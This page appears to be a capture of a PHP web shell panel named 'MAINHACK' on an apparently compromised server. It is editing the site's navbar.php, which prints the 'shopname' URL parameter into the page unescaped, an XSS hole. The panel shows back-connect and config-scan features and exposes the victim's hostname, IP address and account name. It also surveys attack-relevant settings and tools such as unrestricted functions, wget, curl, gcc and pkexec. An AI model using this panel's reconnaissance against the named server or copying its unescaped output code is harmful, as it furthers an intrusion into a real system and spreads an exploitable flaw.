[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: navbar.php
<?php if(isset($_GET['shopname'])){ $getshopname = mysqli_real_escape_string($new,$_GET['shopname']); } ?> <!-- START NAVBAR SECTION --> <header id="header" class="header-section"> <div class="container"> <nav class="navbar"> <a href="index.php?shopname=<?php echo $getshopname;?>" class="navbar-brand"> <h3 style="color:#ffffff" class="contact-info"><?php echo $getshopname;?></h3> </a> <div class="d-flex menu-wrap align-items-center main-menu-container"> <div class="mainmenu" id="mainmenu"> <ul class="nav"> <li><a href="index.php?shopname=<?php echo $getshopname;?>">HOME</a></li> <li><a href="index.php?shopname=<?php echo $getshopname;?>#services">SERVICES</a></li> <li><a href="index.php?shopname=<?php echo $getshopname;?>#gallery">GALLERY</a></li> <li><a href="index.php?shopname=<?php echo $getshopname;?>#pricing">PRICING</a></li> <li><a href="feedback.php?shopname=<?php echo $getshopname;?>">FEEDBACK</a></li> <!-- <li><a href="index.php?shopname=<?php echo $getshopname;?>#contact-us">CONTACT US</a></li> --> <!-- <li><a href="./#services">SERVICES</a></li> <li><a href="./#gallery">GALLERY</a></li> <li><a href="./#pricing">PRICING</a></li> <li><a href="./#contact-us">CONTACT</a></li> --> </ul> </div> <div class="header-btn" style="margin-left:10px"> <a href="appointment.php?shopname=<?php echo $getshopname;?>" class="menu-btn">Book an Appointment</a> </div> </div> <a class="mob-menu-toggle"> <i class="fa fa-bars"></i> </a> </nav> </div> </header> <div class="header-height" style="height: 80px;"></div> <div id="menu_mobile" class="menu-mobile-menu-container"> <ul class="mob-menu-top"> <li class="menu-header"> <a href="#">MENU</a> </li> <li style="display: inline-block;"> <a class="mob-close-toggle" style="cursor: pointer;width: 75px;"> <i class="fas fa-times" style="color: white;"></i> </a> </li> </ul> <div class="menu-tab-div"> <ul id="mobile-menu" class="menu"> <li> <a href="appointment.php?shopname=<?php echo $getshopname;?>" class="a-mob-menu"> Book appointment </a> </li> </ul> </div> </div> <!-- END NAVBAR MOBILE -->
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.98 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002